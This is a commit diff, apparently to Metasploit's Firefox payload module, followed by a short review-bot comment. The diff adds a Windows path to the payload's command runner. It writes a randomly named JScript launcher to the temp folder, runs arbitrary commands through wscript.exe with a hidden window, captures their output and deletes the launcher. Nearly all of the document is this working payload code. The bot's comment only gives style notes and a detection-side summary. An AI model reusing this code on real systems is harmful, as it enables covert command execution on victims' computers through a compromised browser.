Rework windows shell to use wscript.
parent
06fb2139b0
commit
7961b3eecd
|
@ -33,16 +33,28 @@ module Msf::Payload::Firefox
|
||||||
%Q|
|
%Q|
|
||||||
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
|
var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
|
||||||
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
|
.getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
|
||||||
var _cmd;
|
var jscript = (#{JSON.unparse({:src => jscript_launcher})}).src;
|
||||||
var runCmd = function(cmd) {
|
var runCmd = function(cmd) {
|
||||||
var shPath = "/bin/sh";
|
var shPath = "/bin/sh";
|
||||||
var shFlag = "-c";
|
var shFlag = "-c";
|
||||||
var shEsc = "\\\\$&";
|
var shEsc = "\\\\$&";
|
||||||
|
var windows = (ua.indexOf("Windows")>-1);
|
||||||
|
|
||||||
if (ua.indexOf("Windows")>-1) {
|
if (windows) {
|
||||||
shPath = "C:\\\\Windows\\\\system32\\\\cmd.exe";
|
|
||||||
shFlag = "/c";
|
|
||||||
shEsc = "\\^$&";
|
shEsc = "\\^$&";
|
||||||
|
var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
|
||||||
|
.getService(Components.interfaces.nsIProperties)
|
||||||
|
.get("TmpD", Components.interfaces.nsIFile);
|
||||||
|
jscriptFile.append('#{Rex::Text.rand_text_alphanumeric(8)}.js');
|
||||||
|
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
|
||||||
|
.createInstance(Components.interfaces.nsIFileOutputStream);
|
||||||
|
stream.init(jscriptFile, 0x04 \| 0x08 \| 0x20, 0666, 0);
|
||||||
|
stream.write(jscript, jscript.length);
|
||||||
|
if (stream instanceof Components.interfaces.nsISafeOutputStream) {
|
||||||
|
stream.finish();
|
||||||
|
} else {
|
||||||
|
stream.close();
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
|
var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8)}";
|
||||||
|
@ -58,19 +70,46 @@ module Msf::Payload::Firefox
|
||||||
.get("TmpD", Components.interfaces.nsIFile);
|
.get("TmpD", Components.interfaces.nsIFile);
|
||||||
stderr.append(stderrFile);
|
stderr.append(stderrFile);
|
||||||
|
|
||||||
var sh = Components.classes["@mozilla.org/file/local;1"]
|
if (windows) {
|
||||||
.createInstance(Components.interfaces.nsILocalFile);
|
var shell = "cmd /c "+cmd;
|
||||||
sh.initWithPath(shPath);
|
shell = "cmd /c "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>"+stderr.path;
|
||||||
|
}
|
||||||
var shell = shPath + " " + shFlag + " " + cmd.replace(/\\W/g, shEsc);
|
else {
|
||||||
shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
|
var shell = [shPath, shFlag, cmd.replace(/\\W/g, shEsc)].join(" ");
|
||||||
|
shell = shPath + " " + shFlag + " " + (shell + " >"+stdout.path+" 2>"+stderr.path).replace(/\\W/g, shEsc);
|
||||||
|
}
|
||||||
var process = Components.classes["@mozilla.org/process/util;1"]
|
var process = Components.classes["@mozilla.org/process/util;1"]
|
||||||
.createInstance(Components.interfaces.nsIProcess);
|
.createInstance(Components.interfaces.nsIProcess);
|
||||||
process.init(sh);
|
var sh = Components.classes["@mozilla.org/file/local;1"]
|
||||||
process.run(true, [shFlag, shell], 2);
|
.createInstance(Components.interfaces.nsILocalFile);
|
||||||
return [readFile(stdout.path), readFile(stderr.path)];
|
|
||||||
|
if (windows) {
|
||||||
|
sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe");
|
||||||
|
process.init(sh);
|
||||||
|
var args = [jscriptFile.path, shell];
|
||||||
|
process.run(true, args, args.length);
|
||||||
|
} else {
|
||||||
|
sh.initWithPath(shPath);
|
||||||
|
process.init(sh);
|
||||||
|
process.run(true, [shFlag, shell], 2);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (windows) {
|
||||||
|
jscriptFile.remove(true);
|
||||||
|
return [cmd+"\\r\\n"+readFile(stdout.path), readFile(stderr.path)];
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
return [readFile(stdout.path), readFile(stderr.path)];
|
||||||
|
}
|
||||||
};
|
};
|
||||||
|
|
|
|
||||||
end
|
end
|
||||||
end
|
|
||||||
|
def jscript_launcher
|
||||||
|
%Q|
|
||||||
|
var cmdStr = '';
|
||||||
|
for (var i = 0; i < WScript.arguments.length; i++) cmdStr += WScript.arguments(i) + " ";
|
||||||
|
(new ActiveXObject("WScript.Shell")).Run(cmdStr, 0, true);
|
||||||
|
|
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
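Review bot: The new Windows branch of `runCmd` and the `jscript_launcher` helper carry no comments, and the call `stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0)` uses raw open flags plus a legacy octal literal that strict-mode JavaScript rejects. I would add `// PR_RDWR | PR_CREATE_FILE | PR_TRUNCATE` above that call (confirm against the NSPR flag values) and write the mode as `parseInt("0666", 8)`. The two branches also return different shapes, since Windows prepends `cmd+"\r\n"` to stdout, and that deserves a one-line comment saying why. For module documentation and for anyone reading from the detection side, it is worth stating what the visible lines do: each command writes an 8-character randomly named `.js` file under `TmpD` and runs it with `C:\Windows\System32\wscript.exe`, presumably as a child of the Firefox process, with stdout and stderr redirected to temp files.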